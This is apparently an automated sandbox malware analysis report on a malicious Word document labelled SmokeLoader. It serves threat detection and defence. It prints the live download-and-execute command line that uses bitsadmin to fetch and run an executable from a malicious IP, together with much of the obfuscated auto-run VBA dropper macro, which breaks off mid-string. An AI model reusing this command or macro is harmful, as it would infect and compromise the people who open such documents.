Free Automated Malware Analysis Service - powered by Falcon Sandbox - Viewing online file analysis results for 'fax-120717

malicious

Threat Score: 100/100 AV Detection: 77% Labeled as: VBA.Agent #SmokeLoader

fax-120717_094384372834792.doc

This report is generated from a file or URL submitted to this webservice on December 7th 2017 16:34:44 (UTC)
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1, Office 2010 v14.0.4
Report generated by Falcon Sandbox v7.20 © Hybrid Analysis

Overview Sample unavailable Re-analyze Hash Seen Before Show Similar Samples Report False-Positive Request Report Deletion

Incident Response

Risk Assessment

Persistence: Spawns a lot of processes
Fingerprint: Reads the active computer name
Reads the cryptographic machine GUID

Indicators

Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.

Malicious Indicators 9
External Systems
- Found an IP/URL artifact that was identified as malicious by a significant amount of reputation engines
  
  details
  
  5/65 reputation engines marked "http://185.81.113.106" as malicious (7% detection rate)
  
  source
  
  External System
  
  relevance
  
  10/10
- Sample was identified as malicious by at least one Antivirus engine
  
  details
  
  5/60 Antivirus vendors marked sample as malicious (8% detection rate)
  2/35 Antivirus vendors marked sample as malicious (5% detection rate)
  
  source
  
  External System
  
  relevance
  
  8/10
General
- Document spawns new processes
  
  details
  
  Document spawned a new process (macro present)
  
  source
  
  Indicator Combinations
  
  relevance
  
  7/10
- The analysis extracted a file that was identified as malicious
  
  details
  
  6/65 Antivirus vendors marked dropped file "urlref_http185.81.113.106L33LMj7.exe" as malicious (classified as "QVM03.0.B013.Malware" with 9% detection rate)
  
  source
  
  Binary File
  
  relevance
  
  10/10
Installation/Persistance
- Utilizes bitsadmin (possibly used for persistence)
  
  details
  
  Process "bitsadmin.exe" with commandline "bitsadmin /transfer j1 http://185.81.113.106/L33LMj7.exe %TEMP%\1.exe" (Show Process)
  Process "bitsadmin.exe" with commandline "bitsadmin /create /download j2" (Show Process)
  Process "bitsadmin.exe" with commandline "bitsadmin /addfile j2 http://185.81.113.106/indexsdfgfdsafdefsdd.php %TEMP%\1.txt" (Show Process)
  Process "bitsadmin.exe" with commandline "bitsadmin /setcustomheaders j2 User-Agent:Mozilla/4.0" (Show Process)
  Process "bitsadmin.exe" with commandline "bitsadmin /resume j2" (Show Process)
  Process "bitsadmin.exe" with commandline "bitsadmin /complete j2" (Show Process)
  
  source
  
  Monitored Target
  
  relevance
  
  5/10
Unusual Characteristics
- Contains embedded VBA macros with keywords that indicate auto-execute behavior
  
  details
  
  Found keyword "Document_Open" which indicates: "Runs when the Word document is opened"
  
  source
  
  Static Parser
  
  relevance
  
  10/10
- Contains embedded string that indicates auto-execute behavior
  
  details
  
  Found keyword "Document_Open" which indicates: "Runs when the Word document is opened"
  
  source
  
  File/Memory
  
  relevance
  
  10/10
- Spawns a lot of processes
  
  details
  
  Spawned process "WINWORD.EXE" with commandline "/n "C:\b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc"" (Show Process)
  Spawned process "cmd.exe" with commandline "/c bitsadmin /transfer j1 http://185.81.113.106/L33LMj7.exe %TEMP%/1.exe &bitsadmin /create /download j2 &bitsadmin /addfile j2 http://185.81.113.106/indexsdfgfdsafdefsdd.php %TEMP%/1.txt &bitsadmin /setcustomheaders j2 User-Agent:Mozilla/4.0 &bitsadmin /resume j2 &bitsadmin /complete j2 && start %TEMP%/1.exe" (Show Process)
  Spawned process "bitsadmin.exe" with commandline "bitsadmin /transfer j1 http://185.81.113.106/L33LMj7.exe %TEMP%\1.exe" (Show Process)
  Spawned process "bitsadmin.exe" with commandline "bitsadmin /create /download j2" (Show Process)
  Spawned process "bitsadmin.exe" with commandline "bitsadmin /addfile j2 http://185.81.113.106/indexsdfgfdsafdefsdd.php %TEMP%\1.txt" (Show Process)
  Spawned process "bitsadmin.exe" with commandline "bitsadmin /setcustomheaders j2 User-Agent:Mozilla/4.0" (Show Process)
  Spawned process "bitsadmin.exe" with commandline "bitsadmin /resume j2" (Show Process)
  Spawned process "bitsadmin.exe" with commandline "bitsadmin /complete j2" (Show Process)
  
  source
  
  Monitored Target
  
  relevance
  
  8/10
Hiding 1 Malicious Indicators
- All indicators are available only in the private webservice or standalone version

Suspicious Indicators 6
Environment Awareness
- Reads the active computer name
  
  details
  
  "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
  "cmd.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
  "bitsadmin.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
  
  source
  
  Registry Access
  
  relevance
  
  5/10
- Reads the cryptographic machine GUID
  
  details
  
  "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
  "bitsadmin.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
  
  source
  
  Registry Access
  
  relevance
  
  10/10
External Systems
- Found an IP/URL artifact that was identified as malicious by at least one reputation engine
  
  details
  
  5/65 reputation engines marked "http://185.81.113.106" as malicious (7% detection rate)
  
  source
  
  External System
  
  relevance
  
  10/10
Installation/Persistance
- Drops executable files
  
  details
  
  "urlref_http185.81.113.106L33LMj7.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
  
  source
  
  Binary File
  
  relevance
  
  10/10
Network Related
- Found potential IP address in binary/memory
  
  details
  
  Heuristic match: "Added http://185.81.113.106/indexsdfgfdsafdefsdd.php -> %TEMP%\1.txt to job."
  Heuristic match: "bitsadmin /transfer j1 http://185.81.113.106/L33LMj7.exe %TEMP%\1.exe"
  Heuristic match: "bitsadmin /addfile j2 http://185.81.113.106/indexsdfgfdsafdefsdd.php %TEMP%\1.txt"
  
  source
  
  File/Memory
  
  relevance
  
  3/10
Unusual Characteristics
- Contains embedded VBA macros with suspicious keywords
  
  details
  
  Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
  Found suspicious keyword "Chr" which indicates: "May attempt to obfuscate specific strings"
  Found suspicious keyword "Xor" which indicates: "May attempt to obfuscate specific strings"
  
  source
  
  Static Parser
  
  relevance
  
  10/10

Informative 19
Environment Awareness
- Reads the registry for installed applications
  
  details
  
  "WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\WINWORD.EXE")
  "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\WINWORD.EXE")
  "WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL")
  "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL")
  "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\ADDRESSBOOK")
  "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\ADOBE FLASH PLAYER NPAPI")
  "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\AUTOITV3")
  "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\CONNECTION MANAGER")
  "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\DIRECTDRAWEX")
  "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\DXM_RUNTIME")
  "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\FONTCORE")
  "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IE40")
  "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IE4DATA")
  "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IE5BAKEX")
  "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA")
  "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA0")
  "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA1")
  "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA10")
  "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA100")
  "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA101")
  
  source
  
  Registry Access
  
  relevance
  
  10/10
General
- Contains embedded VBA macros
  
  details
  
  File "ThisDocument.cls" (Streampath: "Macros/VBA/ThisDocument") has code: "Function f535970() As Long
  On Error Resume Next
  Dim v457985 As String, v654922 As String, v276489 As String, v888744 As Long, v699685 As Long, v633871 As Variant, v800367 As Variant, v196217 As Variant, v360979 As Long
  
  v654922 = "sURpyTXL68ATg5t89WuxA68yP4YZyAD03eP5dlCkqoovnln67Gxz4O3AywlBm7wO2qAay4u7kX2RjfeKaeOhunHmeTN5iGQQu0f9SPfpGOJ8buk1tAtu8i9Auaox4oUqreLnQmyz8Lg6Q1WuYwJ2Zz2yEnzjJCoHJ8n6kBuZZg0I0GOFIAbY9rkDzsgJNdbycTlz2rNn1e94yK6WO0GlsZUj9Sdp9V6qLcXTjdbHvTtZ8CQoReyrVmrk3TrWwaBPZITrsZjfsGfGDIkulAD5laeyv1EeybVIutW0ZiAPfxAWsDCHyhgS0P2dyAB8UIiAwACB7iYN2wqvOw80jkPhQw7uY6cYUamA5Hup1unfT4R2ZthEZof49FiQF3Jz8rYkSvuhItsDRh3J3qVcuDPELUs9AKHFlCQPcIbWGvqSE5gKTBr8fxgS0pPxn3rv1lEiO3D84KSUkXh8nTFxdnLHWP2SgfWzQdQz11GU17GZAP5HuA368WutHOlr8ArnCl89J3R7tHi0dLK9e62WcsJIWySDuVPHzltQWAPtdBzmm2goQalSJwB8YBgbc9YRbCGTLq1EVLRJ7508kEtKPLXJXOlwKGEOFOu70OnIONb5mCzUI9kGc8LIOdfrnltUGFYddv4"
  v457985 = "5IwUVX0fIScrD2j4sKb6hXKbtLKAapN4VuHHyl0BLO88VdCI2RHCzGYYXcGSXT6AtUOITF5h3zDo9rpeSsbSEGKZo2Pch94067qiPmgxggJmkH9Da9VRodthHSrIQV1dV0vnHPTx4sFNbCbABJ6S41GVuJBOQqAuEr6VPu8G7XX7fi1OzxSfuec8ndpL7L8LXnVvj5HmSfijqBA2a3iiiLLLR9jIx4LHFbl7ckSiOwKlh3shOqmpwBjlBtgwJ4gpkBqVw5UgHjKK3WrB3vy00sI97soadEyK60t9KvDAhY4iHVfPEcDVCXN5XqOjPwb3EntVqhY9Y3jV8xgS1GVSazWl4odJFzf4CKAxp8ge5rR1Ao2Q0VYh1o7omZ"
  v276489 = "8peq9zGUh9foXNZYyWQm3TjtlfnvDX6EEWxHfAHjJClZaVcNK1PlcfhHenvp1ZYiwZRBDN1uGEkkgvfUzG3s6d9Fe1YCeNdYNbipSRUHNZ4qJO02cOkWc8oeJOSYK8Fe46UOCAkYKKd87mnrcUfFn8tts9JGo5Ii6IOEGyJQdOjQZa0vbcibSaFzzk7bFPbPrG8Erooqt01mw2xYnPEdi04DRtdYB4WeFXHPpOFKSaQqI7YFhceQCeSmvLKAZH95l31x4"
  v800367 = "87"
  v268930 = "34"
  v196217 = "76"
  v633871 = "41"
  
  v633871 = Int(v268930)
  v633871 = Log(v800367)
  v196217 = v196217 * v268930
  
  v888744 = 3 + 8
  'Amet pariatur veniam duis amet occaecat Lorem.
  v633871 = v268930 + v633871
  'Cupidatat quis cillum mollit mollit nisi aliqua quis consequat veniam sint eu quis excepteur nisi.
  'Exercitation eiusmod consectetur minim sit qui nulla aliqua. Voluptate id veniam ut cillum cupidatat mollit reprehenderit ea officia exercitation.
  v196217 = v633871 - v196217
  
  v360979 = 2 + 4
  v268930 = v633871 - v633871
  'Aliqua cillum aute labore et duis sunt cillum culpa aliquip cupidatat reprehenderit voluptate magna.
  'In irure officia enim qui fugiat cillum dolor.
  
  For i = 0 To 238742364 Step 1
  v699685 = v699685 + v888744 - v360979
  Next i
  'Labore enim consequat amet occaecat elit reprehenderit proident consequat Lorem duis. Reprehenderit veniam veniam voluptate in laboris voluptate occaecat esse.
  'Velit ex nostrud ullamco magna incididunt et.
  v196217 = RGB(27, 73, 191)
  'Esse veniam est occaecat adipisicing ipsum Lorem duis id eiusmod.
  
  f535970 = v699685
  End Function
  
  Function f619350() As Long
  On Error Resume Next
  Dim v399231 As String, v735914 As Long, v710638 As String, v150022 As String, v295955 As Variant, v534234 As Variant, v915810 As Long, v632543 As Variant
  Dim v368495(0 To 4) As String
  
  v368495(0) = "UXpwY1VISnZaM0poYlVSaGRHRmM="
  v368495(1) = "UXpwY1VISnZaM0poYlVSaGRHRmNOdz09"
  v368495(2) = "UXpwY1VISnZaM0poYlVSaGRHRmNjV0ZUUW04NFlqST0="
  v368495(3) = "UXpwY1VISnZaM0poYlVSaGRHRmNXbTEyVGtSak4wSjFNVzQyUkE9PQ=="
  v368495(4) = "UXpwY1VISnZaM0poYlVSaGRHRmNRVmRUVW5KUk1sYzU="
  
  v150022 = "2rO7rtIruCZY3r0Yr2XrnJzdgdirZ10sy4qYkjIUjBIA4i3xLeGizYkFxJx9VpUYhhF31E1RzbtxSKm92A5Y9fIZDJSKXDHIAswDtHewgnikvc97xaC0Gx7p35AYegGGwzpjh1lDkctOWBtzjNqBUTwUpczuogHoqopQkoGlS58i2RFrcoU5bj0OCfI640cAeW1oYPj06JZfvdBYqsbFIOXBw18I7Z5Enzab79nFB8U4HKRAxRD64byHInBsqWmS2EuraCxLoRnuNJzYxr0G8e7nrcsGhsVAONdHeaxfTpKjcZPix6ET9UiXEnUnUotsKoAE6CpCnnyGq2LN6eDJm3DtYda5zXaOUij8oyfKc4ET1q4vTN0IIG9GiG73XVBU56LZ8lf6AmjDOzNkgg53NVSzVDVmo82hPDGuogOpyHtRUSbzv6eklPKhTCBXsilCWBU0paZ1DuZbgydKbrK8RdlnNsZpORZV4hAdplN0LF2Wn8c0hlGZ4gUrKkIUz63LRQUs4D8lh7OWzjAGfNg4Jn6yrlsdeen820oc0ut1hmGtR5GUXjj8TphHp0Tdq7le"
  v710638 = "WDIX7TWp6wlOLLj1OhkJ2yRSUy7f37V2UynYXYaydsfiEEsHzPJmhCwjYQqWBseZqeHPtexGXrSxDcek05pXPIca7xqEfcajs0GHwSB24uQhFXOz00jmKVt9IbsOpAiGQSuY0vO83Cl44QlxDtpILnx0shnN9czbFGivdyncNK0I4skR2gfz1nHbDy61cSInxoohhoSxuWlS0tzAzdq0eJsh7s7mGTbSaZJH6rdcnKJz4z98XXkZkS7A2LZlj0lB5FCCp3KEVXoq9o69NGhLsJPz8y1nPQCgNx4DbBdC9IeJB7sXYl1OcyYDjZ7HenSfOQJLX6PhzwxDkA1GPCeBVNDbRcCeJVSYDPk9lcsXVZURRjqU5amazDKXOUGAbxzYbCfQYtjKT5n6cR4b45gCnl5xBUbQ0wCfZNPqhO7KtOERY4rtSIFYmzSHXisHOFAwtiL7zb5JviKdrTo0P3kgwq6dhnvL6GfR6kZq74QaF8gFo7T1xVnw5vI4hU00WDGN13ESyPWEiuA2ZwKjZgiRXuCPT7X5AYBlFcgWxvTJyCh2r7SCk"
  v295955 = "82"
  v534234 = "86"
  
  'Occaecat do enim anim adipisicing in eiusmod anim proident est aliquip reprehenderit dolore commodo.
  v295955 = v534234 - v534234
  v534234 = Sin(v295955)
  
  For i = 0 To 4 Step 1
  'Cillum incididunt irure ut tempor. Nulla Lorem cupidatat mollit aute laboris mollit aliquip.
  v295955 = v295955 + v534234
  'Occaecat dolore dolore elit in. Dolore cillum aute labore dolor ea velit.
  
  v399231 = f245997(f245997(v368495(i)))
  v295955 = v295955 + v534234
  v295955 = Exp(v295955)
  v295955 = v534234 + v534234
  v295955 = v295955 + v534234
  
  If Dir(v399231, vbDirectory) = "" Then
  'Cillum aliquip anim do consequat quis.
  v534234 = Cos(v295955)
  'Consectetur elit ad duis anim esse laborum id dolor reprehenderit enim.
  v534234 = Exp(v295955)
  'Proident proident non consectetur proident proident cupidatat reprehenderit est ut. Irure nulla proident reprehenderit esse dolore aliquip et proident duis.
  
  v735914 = v735914 = 111
  v915810 = v735914
  'Irure dolore quis irure incididunt quis laborum. Ullamco incididunt qui id irure in sunt reprehenderit sint nisi duis ad culpa cupidatat sit.
  'Ea minim anim excepteur cupidatat nostrud esse pariatur quis dolor id quis incididunt occaecat in. Est laborum culpa fugiat qui ad exercitation.
  v534234 = v295955 + v295955
  'Commodo excepteur enim reprehenderit Lorem eu laboris eu sint cupidatat Lorem dolor incididunt magna. Veniam ipsum aliqua fugiat do.
  
  Else
  v735914 = 408
  v915810 = v735914
  Exit For
  v295955 = Asc(v150022)
  v534234 = Atn(v534234)
  v295955 = v534234 + v534234
  'Dolore eu exercitation excepteur ipsum ea commodo proident sunt labore minim magna commodo aute sunt. Commodo quis minim exercitation commodo tempor culpa ex dolore sunt consequat in officia velit.
  
  End If
  Next i
  v534234 = v295955 + v295955
  v534234 = v534234 + v534234
  'Velit in est adipisicing irure et laborum ut eu do sit non in. Ex fugiat ex velit dolor ad.
  'Minim adipisicing ad reprehenderit est labore incididunt culpa minim reprehenderit.
  'Sunt magna incididunt nisi aliquip eu occaecat elit sint.
  
  If v735914 < 104 + 146 Then
  v915810 = f535970
  'Magna do qui cupidatat eiusmod amet voluptate.
  'Id non ea commodo ad. Excepteur adipisicing dolor nulla in irure consectetur fugiat magna ad adipisicing ex quis eu.
  v534234 = v295955 + v295955
  
  f560483 (v915810)
  v295955 = Atn(v295955)
  'Cillum in aute esse nisi commodo ut esse enim id.
  v534234 = Cos(v534234)
  
  Else
  v735914 = 340
  End If
  
  f619350 = v735914
  End Function
  
  Sub Document_Open()
  On Error Resume Next
  Dim v121919 As Variant, v538623 As String, v427540 As Variant, v771268 As Variant, v914102 As String, v805286 As Variant, v125215 As String, Var_5 As Variant
  v125215 = "HUmkSzvqBVhNzyVCEHIDJ0VSX8bBe8WtTkrD3lW952PXOpDVkCsWgc0m51hEWpD8hsUGS3ocf0ubon8JnpFYXW7CHozvRWIo1KsoX32uapbTF42F52604CO6fIjgVbBb3RZU67fxPbxqioRxQARRKiimZVNCyXtGEBvzJeziUc6IqkDf2VLswAEU3IF7cNEhQWkjqhwFxtXcm5xASKWN46qslcxcGy4bejXnZPBWfnhsSNBexZf1IuvUm1P1n9G8jnC6Ty5EWbHFmG4UCTj4VshkOkTfhcg80rop8OCZdaWrGhqgJH6n23PULvwAKpoKgFSgEJyQ"
  v538623 = "admprReQadSVz2VgozjBKtczF3u1j4F1DeaF9wyILLgUcaittlJ0hrCnA1aTiNFkcOdVFkrjJJbNa4QAjensZeoGQWceUK8CXofJ2QJWCVEouBnuA6zZJoT1O3JzIpAX7o9Nu5fROltjYpAx6SYuwAe3ygxQZ5VoqU9q6xG0e3SK35noXan1SuIiTkgncR50xunjzR8YxLCY1YVhLs"
  v914102 = "cLqKiiStInxYxLdU9PA8KTfBzzx7jiyDmJYdDnHbcGaFnlPBr4zXYRWlfWpjY5j2AUrsvpD13AHhQorKaB77qj190nlWXZL1mryUQEKiHDsE4rn0fpWs2zXm9x9DgBxiRTClwITYxr32awqVb2xvQmkYBLAnuOkDnmZ4fwIUGyuut"
  v427540 = "100"
  v805286 = "52"
  v771268 = "93"
  v121919 = "41"
  v623978 = "67"
  Call f92167
  v121919 = v771268 + v427540
  'Deserunt aliquip ipsum reprehenderit occaecat incididunt. Velit mollit reprehenderit veniam reprehenderit ad irure consequat dolor eu non culpa ut et.
  'Nisi sunt pariatur non et ex eiusmod consequat minim id.
  'Tempor dolor eiusmod quis velit ullamco ipsum adipisicing ad.
  
  Call f92167
  'Enim eiusmod ad ad qui consectetur deserunt ea esse anim tempor pariatur proident.
  v121919 = v427540 - v771268
  'Quis est qui consequat ad. Exercitation elit in officia et qui do mollit occaecat.
  v771268 = Int(v805286)
  
  'Id incididunt enim occaecat reprehenderit.
  v805286 = v805286 - v771268
  v623978 = v771268 - v121919
  'Cillum veniam minim tempor non sint do quis dolor enim commodo.
  
  Call f619350
  v623978 = v805286 - v427540
  v771268 = Sin(v771268)
  v121919 = v623978 + v427540
  'Aliquip culpa eu labore proident cupidatat veniam culpa. Nostrud ullamco laboris excepteur veniam culpa labore ut irure do aliqua et.
  
  'Voluptate dolore eu fugiat sunt id velit non in eu Lorem ut voluptate ullamco dolor.
  v805286 = Atn(v121919)
  'Pariatur consectetur laborum quis minim cillum dolor proident dolor culpa aute sit.
  'Velit cupidatat cupidatat aliquip nisi anim occaecat. Nisi in Lorem Lorem dolor.
  
  Call f624191
  'Proident irure nostrud laborum ullamco dolor. Ex Lorem pariatur eiusmod velit culpa veniam occaecat Lorem Lorem Lorem eiusmod exercitation.
  'Et eiusmod occaecat mollit consequat eu voluptate. Qui qui proident ullamco sit id ullamco cupidatat id incididunt incididunt occaecat reprehenderit.
  v427540 = Sqr(v623978)
  'Est in eiusmod labore exercitation id ullamco duis sunt pariatur veniam. Id aute esse enim laboris cupidatat occaecat deserunt veniam aliqua nulla est laborum nisi.
  'Occaecat nisi ipsum qui ullamco consectetur cillum officia occaecat excepteur duis ex.
  
  v623978 = RGB(122, 117, 189)
  v805286 = Fix(v623978)
  'Id et Lorem aute eiusmod exercitation exercitation proident laboris ut officia esse non duis. Amet ipsum magna in enim amet quis cillum ea ex veniam sit laborum pariatur mollit.
  v623978 = v771268 + v771268
  'Reprehenderit est id in minim sunt deserunt minim reprehenderit nulla aliquip nisi sunt.
  
  v805286 = v623978 + v121919
  'Adipisicing qui elit eiusmod commodo laboris sunt amet sunt sunt officia ex. Occaecat irure laborum aute eiusmod cillum aute et in pariatur.
  v623978 = Exp(v771268)
  'Aliquip excepteur ad elit reprehenderit duis labore consectetur duis minim officia labore ut ullamco ex. Consequat sint adipisicing eiusmod aute dolore et proident proident.
  'Irure nisi adipisicing mollit cupidatat et ullamco nostrud Lorem deserunt anim et veniam consectetur.
  
  End Sub
  
  Function f92167() As Long
  On Error Resume Next
  Dim v930682 As String, v181932 As Variant, v530875 As Variant, v742279 As String, v240057 As Variant, v133308 As Variant, v504342 As String, Var_5 As Variant
  v742279 = "3xTokYVxpfOnIfp4Zvf7XmSOm6XxxihIfZDAdQCHJv1oGyrxpO8Xke77jU4gBqhUp8W2XzJr0zBg5xg2heJsr3FTGldk6mCjipRRo37aXg7qpdnpHLv7aOD1Ca8o9hQvU11JS8oEffvcW1K2C0pdGNtL9qa9eRcEopZpxOJEwE5Y7lHxU90Zs6"
  v504342 = "O3mJR71aV1DGK5Rpk5mY7nIfxa5xkXypz2A36gHxtWuAUjDmGENdAFxxjlnKeTheT3d1HSJLPPU5zC1KDKzXgjvQhI7jZVCxFGFINlK8tN8mz3FGQrNGzgEJnAJnVfku0erBjF1TvLxbt8ZGKDrFy7qFtjdlk0wzJ5lYV7k86gtLHeQTKdC7vq8mYcvgauB7t6PmiY1E5B9YZAZiEs1baTOszxLladna0"
  v930682 = "ndawXX5ZqZ3trgHxxhpDhqX5i3E6PCJlVCnjeEmO672mLYfIGC8nkn6vPA8gSS1tsBy7Fafqgl5kbKOc6v83FSJxyyhX1sqtthBCFKgFyoYy"
  v181932 = "76"
  v240057 = "65"
  v133308 = "26"
  v530875 = "88"
  v442572 = "38"
  
  v442572 = v442572 - v240057
  v240057 = v530875 + v442572
  v240057 = Sgn(v240057)
  'Nisi amet incididunt aliquip id do duis ullamco ea excepteur ad ullamco ut.
  'Fugiat cillum qui ullamco esse deserunt duis aliqua incididunt ad. Irure velit ea ad commodo irure aliqua.
  
  f92167 = 1
  End Function
  
  Function f560483(num_x As Long) As Long
  On Error Resume Next
  Dim v664867 As Long, v152021 As Long, v847141 As Variant, v615031 As Long, v631517 As String, v572717 As String, v758456 As String, v877340 As Variant, v349656 As Variant, v71433 As String, v562180 As Variant, v240427 As String, v135778 As Variant
  v71433 = "kGTzwjKFHSPLzf4gDqXLp4z8KGm2Rmp3wNxQjksipAr0RULSYkgQRWAAUugUWLoGPS2w45vjRvRFWzSl0GHYckvWbHOYgFSRH5oj"
  v631517 = "HyF7Rd7bjOQBaenYsLyDyDFnr3ERqFnVebocsuujLUxvzD1rUuCXW61NUnGD8hUJKIdEAI0HI186awy15pwTCh7sDkcPfHeG0pzBXs45"
  v562180 = "33"
  v349656 = "98"
  v877340 = "53"
  v135778 = "62"
  
  'Amet laborum elit irure sint eiusmod laborum nostrud magna.
  'Dolore quis deserunt consequat laborum.
  'Lorem velit incididunt amet mollit incididunt id. Quis reprehenderit nulla nostrud sit eu dolore ea enim magna ea cupidatat duis.
  v877340 = Int(v562180)
  
  'Laboris proident fugiat id ut anim culpa et qui magna.
  'Ut irure laboris proident incididunt id in reprehenderit et sint amet Lorem officia ex.
  'Tempor ex reprehenderit adipisicing irure eiusmod mollit excepteur aliqua nisi est labore ipsum in nostrud.
  
  v135778 = Abs(v135778)
  v135778 = Abs(v135778)
  'Tempor eu laborum adipisicing fugiat fugiat aliquip consequat. Eu deserunt qui laboris id veniam laborum ad ut pariatur nisi non nostrud amet eiusmod.
  'Non culpa do eu laboris anim culpa dolor sunt.
  v877340 = Exp(v135778)
  
  v758456 = "UtC3Q2yAInK7igzl167S9lmImPRmCZzuNSuXxVJzAkKUSZrUbddhOL75XoKqIJ5JjEaCZqUhdhWOxflQshatAqN54v5URODSlVbhTJCrpbFdjpvo6Fp0jKAdlniokhjhHuBjRIzxqv8XAqsW99Pc19HWcgP6Oo89JYBR5IFsjcw8UGRsRU9Pjv8CLc5aFRGTZtAlmzR3dLJLBRXpgtD0Z84jiXSbCyLFcKLkFRvQtR7Stltwpi5WlRCa9ZQzT44oX3cNjO3uj8liZPogqG3jYyxfcib9UasigdPary8RVYeJhewTNfCneirxIwf1Ur5Vs2IuY3UqGIPxij"
  
  v240427 = "MThAMTIxQDEyMkAzMkA3QDM4QDI5QDEyN0AxN0AyNEAxMEA2MUAxOEA1MEA5QDM0QDQyQDE5QDI1QDQ5QDE4QDI4QDI1QDYzQDQyQDI4QDEyN0A0NEA3QDEyMEAyNUA1MEAxOEAyOEAxMjZANDlAMTdAMzhAMjlANTBAMkAxMkAzNkA1MUAyQDEyQDM1QDEyM0A0N0AzQDEwQDEyNUA3QDUwQDExNUA1MUA0QDE1QDMwQDYyQDRAMTVAMTRANjJANkAzMUAxNEA0OUA3QDMzQDE0QDYwQDVAMzRAMTE0QDZANkA0OUA1QDZAMzFAMjhAMzZAMTIwQDdAMzhAMjlAMTI3QDE3QDI0QDEwQDM5QDI5QDE0QDI5QDVAMzBAOEAzMEA2MUA2QDI0QDEy"
  v240427 = v240427 + "NkAzOUA0NkAxMkAzMEA0NEAxQDM4QDFANTlANDdAM0A1QDM1QDE3QDEyQDEyMkA1OUA0MUAzNEAxMEA2MUAxOEAxMjBAMUAzOUAxOEAxOUAyNUAzOUAyQDhAMTE0QDMyQDQxQDEyMEA0N0A2MkA0MUAxMkAxMTRAMzVAMTdAOEA5QDU4QDZAMzRAMTBAMzhAMThAMzhAMzlAMTIzQDQwQDEyMUAxM0AzMkA0MUAyOEAzOUA2MkAyQDhAMTE0QDM1QDE3QDEyQDI1QDM4QDQyQDI4QDUxQDM5QDJAMTJAMzZANTBAMkAxMkAzNUAxMjNANDdAM0AxMEAxMjVAN0A1MEAxMTVANTFANEAxNUAzMEA2MkA0QDE1QDE0QDYyQDZAMzFAMTRANDlAN0Az"
  v240427 = v240427 + "M0AxNEA2MEA1QDM0QDExNEA1OUA0MUAzOEAyNUAzOUA0NkAzQDVAMzJAMTdAMzhANDdAMzhAMTdAM0A1QDM1QDE3QDM4QDI1QDM5QDE3QDM3QDVAMzJAMTdAOEAxMjZANjBANDJAM0AxMEA0NEAxQDI5QDI1QDEzQDMxQDI5QDEwQDM5QDdANDlAMTRANjJANDdAM0AzNUAxMjNAMkA4QDE3QDM0QDQyQDE5QDI1QDQ5QDE4QDI4QDI1QDYzQDQyQDI4QDEyN0A0NEA3QDEyMEA1QDM5QDQ3QDEyQDVAMTIyQDQwQDEyMEAyNUA2MUA0MUAyOEAzNUAzOUAxOEAyOEAyNUAzOUA0MEAzN0A2QDQ0QDQyQDMzQDJANDRAMjlAMTlANUAzOUA0MEAz"
